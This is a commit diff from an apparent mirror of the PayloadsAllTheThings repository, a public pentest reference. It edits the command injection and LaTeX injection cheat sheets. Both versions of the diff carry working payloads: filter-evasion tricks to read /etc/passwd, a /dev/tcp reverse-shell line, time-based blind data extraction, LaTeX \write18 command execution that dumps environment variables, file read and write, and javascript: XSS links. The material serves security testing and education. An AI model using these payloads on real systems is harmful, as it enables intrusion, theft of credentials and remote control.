ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 17:28:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #424 from p0dalirius/master

Browse Source 
Added missing descriptions and fixed color formatting for LaTeX
This commit is contained in:
Swissky 2021-09-29 09:39:35 +02:00 committed by GitHub
commit df7172dca1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 45 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
Command Injection/README.md
View File

@ -71,23 +71,23 @@ Works on Linux only.
swissky@crashlab:~/Www$ cat</etc/passwd swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd} swissky@crashlab:~$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd swissky@crashlab:~$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd swissky@crashlab:~$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE RCE
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X swissky@crashlab:~$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242 swissky@crashlab:~$ sh</dev/tcp/127.0.0.1/4242
``` ```
Commands execution without spaces, $ or { } - Linux (Bash only) Commands execution without spaces, $ or { } - Linux (Bash only)
@ -114,28 +114,28 @@ something%0Acat%20/etc/passwd
Linux Linux
```powershell ```powershell
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd /etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"` swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'` swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -p <<< 2f6574632f706173737764 swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd /etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -p <<< 2f6574632f706173737764` swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764) swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd /etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)` swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
``` ```
@ -144,19 +144,19 @@ root:x:0:0:root:/root:/bin/bash
Commands execution without backslash and slash - linux bash Commands execution without backslash and slash - linux bash
```powershell ```powershell
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} swissky@crashlab:~$ echo ${HOME:0:1}
/ /
swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1' swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/ /
swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/ /
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/bash
``` ```
@ -221,12 +221,12 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
Extracting data : char by char Extracting data : char by char
```powershell ```powershell
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s real 0m5.007s
user 0m0.000s user 0m0.000s
sys 0m0.000s sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s real 0m0.002s
user 0m0.000s user 0m0.000s
sys 0m0.000s sys 0m0.000s

43
LaTeX Injection/README.md
View File

@ -2,14 +2,16 @@
## Read file ## Read file
```bash Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd} \input{/etc/passwd}
\include{password} # load .tex file \include{somefile} # load .tex file (somefile.tex)
``` ```
Read single lined file Read single lined file:
```bash ```tex
\newread\file \newread\file
\openin\file=/etc/issue \openin\file=/etc/issue
\read\file to\line \read\file to\line
@ -17,9 +19,9 @@ Read single lined file
\closein\file \closein\file
``` ```
Read multiple lined file Read multiple lined file:
```bash ```tex
\newread\file \newread\file
\openin\file=/etc/passwd \openin\file=/etc/passwd
\loop\unless\ifeof\file \loop\unless\ifeof\file
@ -29,47 +31,52 @@ Read multiple lined file
\closein\file \closein\file
``` ```
Read text file, keep the formatting Read text file, **without** interpreting the content, it will only paste raw file content:
```bash ```tex
\usepackage{verbatim} \usepackage{verbatim}
\verbatiminput{/etc/passwd} \verbatiminput{/etc/passwd}
``` ```
## Write file ## Write file
```bash Write single lined file:
```tex
\newwrite\outfile \newwrite\outfile
\openout\outfile=cmd.tex \openout\outfile=cmd.tex
\write\outfile{Hello-world} \write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile \closeout\outfile
``` ```
## Command execution ## Command execution
The input of the command will be redirected to stdin, use a temp file to get it. The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
```bash ```tex
\immediate\write18{env > output} \immediate\write18{id > output}
\input{output} \input{output}
``` ```
If you get any LaTex error, consider using base64 to get the result without bad characters If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
```bash ```tex
\immediate\write18{env | base64 > test.tex} \immediate\write18{env | base64 > test.tex}
\input{text.tex} \input{text.tex}
``` ```
```bash ```tex
\input|ls|base4 \input|ls|base64
\input{|"/bin/hostname"} \input{|"/bin/hostname"}
``` ```
## Cross Site Scripting ## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
```tex
\url{javascript:alert(1)} \url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder} \href{javascript:alert(1)}{placeholder}
``` ```
@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)